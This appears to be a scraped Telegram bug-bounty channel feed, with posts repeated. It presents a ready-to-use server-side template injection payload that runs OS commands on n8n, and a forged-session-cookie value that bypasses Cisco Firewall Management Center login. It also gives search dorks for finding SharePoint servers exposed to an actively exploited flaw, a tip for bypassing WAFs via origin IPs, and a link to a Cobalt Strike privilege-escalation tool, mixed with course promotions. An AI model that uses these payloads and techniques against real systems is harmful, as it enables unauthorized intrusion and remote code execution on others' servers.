This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)
The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
If you guys are really enjoy to read, then show your love β€οΈ
#rce #ssti #n8n
DarkShadow is here back again!
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)
The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id").toString()')()}}
If you guys are really enjoy to read, then show your love β€οΈ
#rce #ssti #n8n
β€17π5
Here is 20 Free Coupon For Who Want to Start Their Bug bounty Journey - https://topmate.io/saumadip/2009859?coupon_code=awxe
topmate.io
Bug Bounty Masterclass with Saumadip Mandal
Beginner to bug bounty hunter β tools, recon & real PoCs.
β€2π1
CVE-2026-32201: Microsoft SharePoint Server Spoofing Vulnerability, 6.5 rating βοΈ
Improper input validation in Microsoft SharePoint Server allows an unauthorized attacker to perform spoofing over a network and view sensitive internal data or make unauthorized changes. This vulnerability is already being actively exploited in the wild!
Search at Netlas.io:
π Link: https://nt.ls/DjQpd
π Dork: http.headers.microsoftsharepointteamservices:*
π Dork (MS subdomains filtered): http.headers.microsoftsharepointteamservices:* !host:*.sharepoint.com
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201
Improper input validation in Microsoft SharePoint Server allows an unauthorized attacker to perform spoofing over a network and view sensitive internal data or make unauthorized changes. This vulnerability is already being actively exploited in the wild!
Search at Netlas.io:
π Link: https://nt.ls/DjQpd
π Dork: http.headers.microsoftsharepointteamservices:*
π Dork (MS subdomains filtered): http.headers.microsoftsharepointteamservices:* !host:*.sharepoint.com
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201
β€3
Hey Hunterβs,
DarkShadow is here back again!
Authentication Bypass via Forged Session Cookie
(Cisco Secure Firewall Management Center)
Analysis:
-checks only for the presence of the CGISESSID cookie.
-but does not validate whether the session ID is legitimate, active, or tied to an authenticated user.
Impact:
an attacker can supply an arbitrary or default value like csm_processes to bypass the redirect to /ui/login and gain unauthorized access to the protected resource.
So Guyβs if you really enjoy to ready such as methods then show your loveπ€
#bugbountytips #auth_bypass
DarkShadow is here back again!
Authentication Bypass via Forged Session Cookie
(Cisco Secure Firewall Management Center)
Analysis:
-checks only for the presence of the CGISESSID cookie.
-but does not validate whether the session ID is legitimate, active, or tied to an authenticated user.
Impact:
an attacker can supply an arbitrary or default value like csm_processes to bypass the redirect to /ui/login and gain unauthorized access to the protected resource.
So Guyβs if you really enjoy to ready such as methods then show your loveπ€
#bugbountytips #auth_bypass
β€7π3
π¨ Fortinet just disclosed CVE-2026-39808 and CVE-2026-39813 - 2 critical vulnerabilities affecting FortiSandbox. No active exploitation itw reported as of yet.
Scan your infrastructure to find vulnerable instances:
CVE-2026-39808: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39808.yaml
CVE-2026-39813: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39813.yaml
CVE-2026-39808 (CVSS 9.1):
An Improper Neutralization of Special Elements used in an OS Command ('OS command injection') vulnerability [CWE-78] in FortiSandbox may allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests.
CVE-2026-39813 (CVSS 9.1):
A Path Traversal vulnerability [CWE-24] in FortiSandbox JRPC API may allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests.
Patches are available as per vendor advisories:
https://fortiguard.fortinet.com/psirt/FG-IR-26-112
https://fortiguard.fortinet.com/psirt/FG-IR-26-100
Scan your infrastructure to find vulnerable instances:
CVE-2026-39808: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39808.yaml
CVE-2026-39813: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39813.yaml
CVE-2026-39808 (CVSS 9.1):
An Improper Neutralization of Special Elements used in an OS Command ('OS command injection') vulnerability [CWE-78] in FortiSandbox may allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests.
CVE-2026-39813 (CVSS 9.1):
A Path Traversal vulnerability [CWE-24] in FortiSandbox JRPC API may allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests.
Patches are available as per vendor advisories:
https://fortiguard.fortinet.com/psirt/FG-IR-26-112
https://fortiguard.fortinet.com/psirt/FG-IR-26-100
GitHub
rxerium-templates/2026/CVE-2026-39808.yaml at main Β· rxerium/rxerium-templates
Nuclei scripts created by @rxerium for zero days / actively exploited vulnerabilities. - rxerium/rxerium-templates
β€3π€1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - incursi0n/GodPotatoBOF: Cobalt Strike BOF used to perform privilege escalation by exploiting the SeImpersonate privilege.β¦
Cobalt Strike BOF used to perform privilege escalation by exploiting the SeImpersonate privilege. Based on the original GodPotato PoC by BeichenDream. - incursi0n/GodPotatoBOF
β€6π±2
Please donβt forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the βοΈ to show your support. Thanks!π π π
Please open Telegram to view this post
VIEW IN TELEGRAM
β€4
50 Free Coupon for Bug Bounty Masterclass - https://topmate.io/saumadip/2009859?coupon_code=awxe3
topmate.io
Bug Bounty Masterclass with Saumadip Mandal
Beginner to bug bounty hunter β tools, recon & real PoCs.
β€3π1
awxeβ Brut Security
Please open Telegram to view this post
VIEW IN TELEGRAM
topmate.io
Web Application Bug Bounty Methodology with Saumadip Mandal
Pro hacker's playbook: recon, XSS, SQLi, SSRF & more
5β€4π₯3π1π1
Brut Security pinned Β«β οΈ Just dropped something I've been building for a while π A complete Web Application Bug Bounty Methodology β 59 pages, 20 chapters, real techniques I actually use. Covers everything from recon to JWT attacks, SSRF, XSS, file upload RCE, HTTP smuggling, reportingβ¦Β»
Hey Hunterβs,
DarkShadow is here back again!
Ranking Most common /api vulnerable endpoints:
(not only /api/v1 also test for /api/v2)
π€«if WAF blocks your request then find ip origin and it might works with out bypassing by any extra waf bypass payloads!!!
#bugbountytips #info_leak
DarkShadow is here back again!
Ranking Most common /api vulnerable endpoints:
/api/v1/users
/api/v1/users/{userId}
/api/v1/oauth/token
/api/v1/forgot-password
/api/v1/debug or /api/v1/status
(not only /api/v1 also test for /api/v2)
π€«if WAF blocks your request then find ip origin and it might works with out bypassing by any extra waf bypass payloads!!!
#bugbountytips #info_leak
π₯8β€1